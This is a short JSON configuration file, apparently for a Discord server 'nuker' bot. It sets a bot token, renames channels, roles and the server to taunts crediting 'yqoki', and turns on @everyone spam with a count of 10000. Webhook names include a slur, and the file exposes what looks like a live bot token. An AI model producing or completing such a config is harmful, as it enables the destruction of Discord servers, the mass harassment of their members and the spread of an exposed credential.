{
	"Token": "MTA0MTUyNjk5NzU4ODkxMDE5Mw.Gij0GL.3mmtTMQYNX-3VZ9Li8oK0ABqH2dScrNAaEN9Rk",
	"Prefix": ">",

	"Channel-Names": ["yqoki was here"], 
	"Server-Names": ["beamed by yqoki"],
	"Role-Names": ["@yqokibeamedyou"],
	"Reason": ["beamed by yqoki", "yqoki beamed me"],

	"Spam": true,

	"Webhook-Names": ["@yqokibeamedyou", "get beamed by yqoki retard"],
	"Spam-Messages": ["@everyone yqoki WIZZED YOU", "@everyone yqoki  FUCKED YOUR SERVER"],
	"Spam-Amount": 10000
}
